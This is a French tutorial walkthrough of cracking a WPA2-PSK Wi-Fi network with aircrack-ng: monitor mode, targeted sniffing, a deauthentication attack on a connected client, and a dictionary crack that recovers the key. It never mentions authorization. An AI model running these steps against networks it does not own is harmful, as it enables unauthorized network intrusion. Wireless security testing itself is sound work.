Nous allons passer la carte wifi en mode monitor c’est a dire (la carte écoute tous les paquets wireless même ceux qui ne lui sont pas destiné.)

Pour cela nous utilisons airmon-ng

fluxdeb:~# airmon-ng

usage: airmon-ng <start|stop> <interface> [channel]

Interface Chipset Driver

wifi0 Atheros madwifi-ng

wifi1 Atheros madwifi-ng

1) Passage en mode Monitor

fluxdeb:~# airmon-ng start wifi1

usage: airmon-ng <start|stop> <interface> [channel]

Interface Chipset Driver

wifi0 Atheros madwifi-ng

wifi1 Atheros madwifi-ng

ath0 Atheros madwifi-ng VAP (parent: wifi1) (monitor mode enabled)

Lors du passage en mode Monitor airmon crée un interface virtuel ath0. J’utiliserai ath0 pour la suite du cracking.

2) Découverte des réseaux.

La commande airodump-ng permet de « sniffer » le réseaux afin de découvrir les réseaux wifi disponible.

L’utilisation sans argument permet l’écoute sur tout les canaux et de tout les SSID.

Notez qu’il est possible d’utiliser deux interfaces pour sniffer doublant ainsi la rapidité d’obtention de packet.

airodump-ng <options> <interface>[,<interface>,...]

CH 10 ][ Elapsed: 16 s ][ 2007-05-10 15:24

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:16:46:C6:2D:B1 31 28 0 0 13 54. WEP WEP XXXXX 00:16:46:C6:2D:B0 32 27 7 0 13 54. WPA2 CCMP PSK XXXXX

BSSID STATION PWR Lost Packets Probes

Voici donc nos deux réseaux, le réseaux que je vais cracker est 00:16:46:C6:2D:B0

On peut voir qu'il envoie sur le channel 13. Je vais donc demander a airodump-ng d'ecouter exclusivement notre réseau.

airodump-ng -c 13 -b 00:16:46:C6:2D:B0 -w psk ath0

-c : channel a écouter

-b : mac adress de l'ap

-w : fichier ou l'on sauvegarde les IVs

ath0 : interface

J'obtiens donc ceci

CH 13 ][ Elapsed: 4 s ][ 2007-05-10 15:32

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:16:46:C6:2D:B0 33 58 71 115 3 13 54. WPA2 CCMP PSK XXXXXX

BSSID STATION PWR Lost Packets Probes

00:16:46:C6:2D:B0 00:0C:F1:04:77:D2 43 0 79

Ce qui est important ici ce sont les stations connectés au point d'accès

Il y a en a 1 qui est associé. (00:16:46:C6:2D:B0)

3) Création de traffic.

Afin d'accélérer la récolte d'information, je vais forcer le client authentifié à générer du traffic en le déassociant du point d'accès. Pour ce faire il faut utiliser aireplay-ng.

aireplay-ng -0 1 -a 00:16:46:C6:2D:B0 -c 00:0C:F1:04:77:D2 ath0

-0 : type d'attaque ( déassotiation )

1 : nombre de déassotiation à envoyer

-a : mac de l'ap

-c : mac du client authentifié

15:46:14 Sending DeAuth to station -- STMAC: [00:0C:F1:04:77:D2]

Ce résultat creé donc du traffic ce qui vas augmenter nos chances de cracker la psk.

4) Cracking de la PSK

Afin de cracker la psk aircrack utilise une attaque par dictionnaire.

aircrack-ng -w dico /home/corbier/psk-0*.cap

-w : dictionnaire

/home/corbier.psk-0*.cap : fichier contenant les IVs

Read 78425 packets.

# BSSID ESSID Encryption

1 00:16:46:C6:2D:B0 XXXXXX WPA (1 handshake)

Index number of target network ? 1

Aircrack-ng 0.6.2

[00:00:00] 56 keys tested (83.64 k/s)

KEY FOUND! [ ??????????? ]

Master Key : 31 96 83 02 6E 0D A7 0B 7C 42 95 E2 13 50 FE 31

1A 25 44 5E C4 6D C5 74 54 B7 1F 37 7F C6 E4 65

Transcient Key : F4 B4 54 7E 5E 1A 49 F4 2F 0E 1B CA 25 C1 22 09

B7 F6 E1 6F 2A 00 B9 F5 31 5D 7D A6 97 9B D1 7B

7C 67 3C 15 FF C1 5B D4 7B 0A D4 18 A1 3C EA C6

F8 7B A2 8C 9E 7F FA D4 C4 92 AF 06 4C 47 06 9A

EAPOL HMAC : FF 23 6C A2 A6 10 FF E0 A9 53 E0 2E 1F 61 44 BB

Et voila